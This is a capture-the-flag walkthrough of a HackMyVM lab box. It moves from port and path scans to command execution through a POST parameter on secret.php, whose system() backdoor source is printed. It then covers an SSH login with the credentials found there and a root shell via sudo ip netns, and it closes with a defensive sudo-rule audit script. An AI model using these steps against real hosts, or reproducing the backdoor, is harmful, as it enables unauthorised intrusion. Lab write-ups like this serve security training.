Information gathering
Host scan
arp-scan -l
Port scan
┌──(root㉿kali)-[~]
└─# nmap -sV -p- 192.168.239.198
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-15 11:00 EDT
Nmap scan report for 192.168.239.198
Host is up (0.00032s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.4p1 Debian 5 (protocol 2.0)
80/tcp open  http    nginx 1.18.0
MAC Address: 08:00:27:57:7A:C6 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Path scan
[11:01:32] Starting:
[11:02:01] 200 -   344B - /index.htm
[11:02:18] 200 -   285B - /sitemap.xml

The hint mentions a parameter, so let's visit the page and see what it is.

In the page source we find a path, /secret.php, plus a GET parameter, HackMyVM. Requesting it with the parameter in the query string only returns an error message:
┌──(root㉿kali)-[~]
└─# curl http://192.168.239.198/secret.php?HackMyVM
Now the main part what it is loooooool<br>Try other method
So let's try passing the parameter via POST instead (-d is the data to send). Reading secret.php this way reveals a username and password:
┌──(root㉿kali)-[~]
└─# curl -X POST 'http://192.168.239.198/secret.php' -d 'HackMyVM=cat secret.php'
You Found ME : - (<pre><?php
if(isset($_GET['HackMyVM'])){
    echo "Now the main part what it is loooooool";
    echo "<br>";
    echo "Try other method";
    die;
}
if(isset($_POST['HackMyVM'])){
    echo "You Found ME : - (";
    echo "<pre>";
    $cmd = ($_POST['HackMyVM']);
    system($cmd);
    echo "</pre>";
    die;
}
else {
    header("Location: https://images-na.ssl-images-amazon.com/images/I/31YDo0l4ZrL._SX331_BO1,204,203,200_.jpg");
}
$ok="prakasaka:th3-!llum!n@t0r";
?>
</pre>
Getting a shell
SSH login
prakasaka@method:~$ cat uSeR.txt
e4408105ca9c2a5c*************
Privilege escalation
Running sudo -l shows that ip can be used to escalate privileges:
prakasaka@method:~$ sudo -l
Matching Defaults entries for prakasaka on method:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User prakasaka may run the following commands on method:
    (!root) NOPASSWD: /bin/bash
    (root) /bin/ip
Look up ip on GTFOBins (gtfobins.github.io):
prakasaka@method:~$ sudo ip netns add foo
prakasaka@method:~$ sudo ip netns exec foo /bin/sh
# id
uid=0(root) gid=0(root) groups=0(root)
# cat rOot.txt
fc9c6eb6265921315***********
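As an added defender-side example (not part of the original walkthrough), a small Python audit that parses `sudo -l` output in the layout shown above and flags both problems on this box: a shell-capable binary (ip) runnable as root, and a NOPASSWD rule. The sample text, the SHELL_CAPABLE shortlist and the function names are constructed assumptions.

```python
"""Audit `sudo -l` output for rules that hand out a shell or skip the password."""
import re

# Constructed sample in the layout `sudo -l` prints, mirroring the box's output.
SAMPLE_SUDO_L = """\
Matching Defaults entries for prakasaka on method:
    env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin

User prakasaka may run the following commands on method:
    (!root) NOPASSWD: /bin/bash
    (root) /bin/ip
"""

# Assumed shortlist: binaries whose documented options can spawn a shell.
# The page cites GTFOBins for /bin/ip; extend this set from that reference.
SHELL_CAPABLE = {"/bin/ip", "/usr/bin/ip", "/bin/bash", "/bin/sh"}

# One rule line: "(runas[:group]) [TAG: ...] command [args]"
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>\S.*)$")


def parse_sudo_rules(text):
    """Return [(runas, tags, command)] from the 'may run' section of sudo -l."""
    rules, in_rules = [], False
    for line in text.splitlines():
        if line.startswith("User ") and "may run the following" in line:
            in_rules = True
            continue
        m = RULE_RE.match(line) if in_rules else None
        if m:
            tags = [t.rstrip(":") for t in m.group("tags").split()]
            rules.append((m.group("runas").strip(), tags, m.group("cmd").strip()))
    return rules


def runs_as_root(runas):
    """True for (root), (ALL) or a user list containing root; False for (!root)."""
    users = runas.split(":")[0]          # drop the optional ":group" part
    return users == "ALL" or ("root" in users.split(",") and not users.startswith("!"))


def audit_sudo(text):
    """Flag rules that give a root shell, a shell as other users, or skip the password."""
    findings = []
    for runas, tags, cmd in parse_sudo_rules(text):
        binary = cmd.split()[0]          # ignore any fixed arguments
        reasons = []
        if binary in SHELL_CAPABLE and runs_as_root(runas):
            reasons.append("shell-capable binary runnable as root")
        if binary in SHELL_CAPABLE and runas.startswith("!"):
            reasons.append("shell as any non-root user (lateral movement)")
        if "NOPASSWD" in tags:
            reasons.append("no password required")
        if reasons:
            findings.append({"runas": runas, "command": cmd, "reasons": reasons})
    return findings
```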
Key points
- Information gathering from the site's source code
- GET versus POST as submission methods
- Using curl, since the page issues a redirect